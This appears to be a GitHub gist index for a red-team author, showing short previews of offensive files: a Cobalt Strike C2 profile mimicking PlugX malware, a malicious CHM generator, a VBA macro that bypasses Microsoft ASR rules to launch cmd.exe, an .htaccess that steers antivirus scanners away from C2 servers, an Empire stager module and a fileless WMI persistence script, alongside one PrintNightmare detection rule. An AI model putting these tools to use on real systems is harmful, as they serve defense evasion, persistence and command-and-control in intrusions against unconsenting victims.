infosecn1nja
/ plugx.profile
Last active
April 19, 2022 07:35
Cobalt Strike Malleable C2 Profile - PlugX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # PlugX Profile | |
| # Author: @infosecn1nja | |
| # | |
| # https://github.com/silence-is-best/c2db/blob/master/README.md | |
| set sleeptime "30000"; # use a ~30s delay between callbacks | |
| set jitter "10"; # throw in a 10% jitter | |
| stage { |
infosecn1nja
/ printernightmare_cve_2021_34527.xml
Last active
July 6, 2021 05:39
Wazuh Rules: PrinterNightmare CVE-2021-34527 Exploit Detection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| - PrinterNightmare CVE-2021-34527 Exploit Detection | |
| - Created by Rahmat Nurfauzi (@infosecn1nja). | |
| - This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2. | |
| --> | |
| <group name="sysmon,"> | |
| <rule id="99948" level="15"> | |
| <if_group>sysmon_event_11</if_group> | |
| <field name="win.eventdata.Image">\\\\spoolsv.exe$</field> | |
| <field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field> |
infosecn1nja
/ gen-chm.py
Last active
May 2, 2023 17:15
This script will generate malicious Compiled HTML Help file (.CHM)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import argparse | |
| import re, random | |
| import string, os, os.path | |
| def rand_num(min, max): | |
| return random.randrange(min, max) | |
| def gen_str(size): | |
| return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) |
infosecn1nja
/ gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Last active
November 22, 2023 18:19
Securing CS Teamserver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Make a rule that allows port 80/443 access only from redirector: | |
| iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT | |
| iptables -A INPUT -p tcp --dport 443 -j DROP | |
| iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT | |
| iptables -A INPUT -p tcp --dport 80 -j DROP | |
| Change default port teamserver : | |
| sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver |
infosecn1nja
/ gist:04ab2d8ea15f98880bbf7b70168fa3dd
Last active
January 7, 2024 21:51
APT Group/Red Team Weaponization Phase
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| APT Group/Red Team Weaponization Phase | |
| ======================================= | |
| C2 tools : | |
| - Cobalt Strike | |
| - Empire | |
| - PoshC2 | |
| - PupyRAT | |
| - Metasploit |
infosecn1nja
/ ASR Rules Bypass.vba
Last active
April 25, 2024 21:00
ASR rules bypass creating child processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
infosecn1nja
/ .htaccess
Created
June 9, 2018 09:51
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
infosecn1nja
/ wmic_starfighters.py
Created
June 7, 2018 01:01
Empire stagers module to generates a squiblytwo and starfighters launcher.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lib.common import helpers | |
| class Stager: | |
| def __init__(self, mainMenu, params=[]): | |
| self.info = { | |
| 'Name': 'wmic_xsl_starfighters', | |
| 'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'], |
infosecn1nja
/ WMI-Persistence.ps1
Created
May 14, 2018 15:12
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime) | |
| # https://wikileaks.org/ciav7p1/cms/page_14587908.html | |
| <# | |
| .SYNOPSIS | |
| This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once. | |
| #> | |
| $EventFilterName = "Fileless WMI Persistence SystemUptime" |
NewerOlder